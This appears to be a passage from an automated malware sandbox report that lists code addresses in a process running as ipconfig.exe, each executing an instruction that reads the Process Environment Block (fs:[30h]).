Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA2AE4 mov eax, dword ptr fs:[00000030h]	5_2_02EA2AE4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA2ACB mov eax, dword ptr fs:[00000030h]	5_2_02EA2ACB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]	5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]	5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]	5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]	5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]	5_2_02E752A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h]	5_2_02E8AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h]	5_2_02E8AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAFAB0 mov eax, dword ptr fs:[00000030h]	5_2_02EAFAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h]	5_2_02EAD294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h]	5_2_02EAD294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB927A mov eax, dword ptr fs:[00000030h]	5_2_02EB927A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h]	5_2_02F2B260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h]	5_2_02F2B260
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F48A62 mov eax, dword ptr fs:[00000030h]	5_2_02F48A62
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3EA55 mov eax, dword ptr fs:[00000030h]	5_2_02F3EA55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]	5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]	5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]	5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]	5_2_02E79240
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F04257 mov eax, dword ptr fs:[00000030h]	5_2_02F04257
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]	5_2_02E9A229
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h]	5_2_02EB4A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h]	5_2_02EB4A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E88A0A mov eax, dword ptr fs:[00000030h]	5_2_02E88A0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h]	5_2_02F3AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h]	5_2_02F3AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h]	5_2_02E7AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h]	5_2_02E7AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E93A1C mov eax, dword ptr fs:[00000030h]	5_2_02E93A1C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]	5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E75210 mov ecx, dword ptr fs:[00000030h]	5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]	5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]	5_2_02E75210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9DBE9 mov eax, dword ptr fs:[00000030h]	5_2_02E9DBE9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]	5_2_02EA03E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h]	5_2_02EF53CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h]	5_2_02EF53CA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]	5_2_02EA4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]	5_2_02EA4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]	5_2_02EA4BAD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F45BA5 mov eax, dword ptr fs:[00000030h]	5_2_02F45BA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h]	5_2_02E81B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h]	5_2_02E81B8F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2D380 mov ecx, dword ptr fs:[00000030h]	5_2_02F2D380
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3138A mov eax, dword ptr fs:[00000030h]	5_2_02F3138A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAB390 mov eax, dword ptr fs:[00000030h]	5_2_02EAB390
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA2397 mov eax, dword ptr fs:[00000030h]	5_2_02EA2397
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7DB60 mov ecx, dword ptr fs:[00000030h]	5_2_02E7DB60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h]	5_2_02EA3B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h]	5_2_02EA3B7A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7DB40 mov eax, dword ptr fs:[00000030h]	5_2_02E7DB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F48B58 mov eax, dword ptr fs:[00000030h]	5_2_02F48B58
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7F358 mov eax, dword ptr fs:[00000030h]	5_2_02E7F358
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3131B mov eax, dword ptr fs:[00000030h]	5_2_02F3131B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]	5_2_02E740E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]	5_2_02E740E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]	5_2_02E740E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E758EC mov eax, dword ptr fs:[00000030h]	5_2_02E758EC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]	5_2_02F0B8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB90AF mov eax, dword ptr fs:[00000030h]	5_2_02EB90AF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAF0BF mov ecx, dword ptr fs:[00000030h]	5_2_02EAF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h]	5_2_02EAF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h]	5_2_02EAF0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79080 mov eax, dword ptr fs:[00000030h]	5_2_02E79080
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h]	5_2_02EF3884
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h]	5_2_02EF3884
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F32073 mov eax, dword ptr fs:[00000030h]	5_2_02F32073
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F41074 mov eax, dword ptr fs:[00000030h]	5_2_02F41074
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h]	5_2_02E90050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h]	5_2_02E90050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]	5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]	5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]	5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]	5_2_02E8B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]	5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]	5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]	5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]	5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]	5_2_02EA002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h]	5_2_02F44015
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h]	5_2_02F44015
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]	5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]	5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]	5_2_02EF7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]	5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]	5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]	5_2_02E7B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F041E8 mov eax, dword ptr fs:[00000030h]	5_2_02F041E8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF69A6 mov eax, dword ptr fs:[00000030h]	5_2_02EF69A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA61A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h]	5_2_02EA61A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]	5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]	5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]	5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]	5_2_02EF51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]	5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]	5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]	5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]	5_2_02F349A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9C182 mov eax, dword ptr fs:[00000030h]	5_2_02E9C182
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA185 mov eax, dword ptr fs:[00000030h]	5_2_02EAA185
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA2990 mov eax, dword ptr fs:[00000030h]	5_2_02EA2990
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7C962 mov eax, dword ptr fs:[00000030h]	5_2_02E7C962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h]	5_2_02E7B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h]	5_2_02E7B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h]	5_2_02E9B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h]	5_2_02E9B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E94120 mov ecx, dword ptr fs:[00000030h]	5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h]	5_2_02EA513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h]	5_2_02EA513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]	5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]	5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]	5_2_02E79100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA16E0 mov ecx, dword ptr fs:[00000030h]	5_2_02EA16E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E876E2 mov eax, dword ptr fs:[00000030h]	5_2_02E876E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F48ED6 mov eax, dword ptr fs:[00000030h]	5_2_02F48ED6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA36CC mov eax, dword ptr fs:[00000030h]	5_2_02EA36CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB8EC7 mov eax, dword ptr fs:[00000030h]	5_2_02EB8EC7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2FEC0 mov eax, dword ptr fs:[00000030h]	5_2_02F2FEC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF46A7 mov eax, dword ptr fs:[00000030h]	5_2_02EF46A7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]	5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]	5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]	5_2_02F40EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0FE87 mov eax, dword ptr fs:[00000030h]	5_2_02F0FE87
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8766D mov eax, dword ptr fs:[00000030h]	5_2_02E8766D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]	5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]	5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]	5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]	5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]	5_2_02E9AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]	5_2_02E87E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h]	5_2_02F3AE44
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h]	5_2_02F3AE44
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7E620 mov eax, dword ptr fs:[00000030h]	5_2_02E7E620
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F2FE3F mov eax, dword ptr fs:[00000030h]	5_2_02F2FE3F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]	5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]	5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]	5_2_02E7C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EA8E00 mov eax, dword ptr fs:[00000030h]	5_2_02EA8E00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h]	5_2_02EAA61C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h]	5_2_02EAA61C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F31608 mov eax, dword ptr fs:[00000030h]	5_2_02F31608
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EB37F5 mov eax, dword ptr fs:[00000030h]	5_2_02EB37F5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]	5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]	5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]	5_2_02EF7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E88794 mov eax, dword ptr fs:[00000030h]	5_2_02E88794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8FF60 mov eax, dword ptr fs:[00000030h]	5_2_02E8FF60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F48F6A mov eax, dword ptr fs:[00000030h]	5_2_02F48F6A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8EF40 mov eax, dword ptr fs:[00000030h]	5_2_02E8EF40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h]	5_2_02E74F2E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h]	5_2_02E74F2E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAE730 mov eax, dword ptr fs:[00000030h]	5_2_02EAE730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h]	5_2_02F0FF10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h]	5_2_02F0FF10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h]	5_2_02EAA70E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h]	5_2_02EAA70E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h]	5_2_02F4070D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h]	5_2_02F4070D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9F716 mov eax, dword ptr fs:[00000030h]	5_2_02E9F716
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F314FB mov eax, dword ptr fs:[00000030h]	5_2_02F314FB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]	5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]	5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]	5_2_02EF6CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F48CD6 mov eax, dword ptr fs:[00000030h]	5_2_02F48CD6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E8849B mov eax, dword ptr fs:[00000030h]	5_2_02E8849B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02E9746D mov eax, dword ptr fs:[00000030h]	5_2_02E9746D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h]	5_2_02F0C450
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h]	5_2_02F0C450
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EAA44B mov eax, dword ptr fs:[00000030h]	5_2_02EAA44B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EABC2C mov eax, dword ptr fs:[00000030h]	5_2_02EABC2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]	5_2_02EF6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]	5_2_02EF6C0A
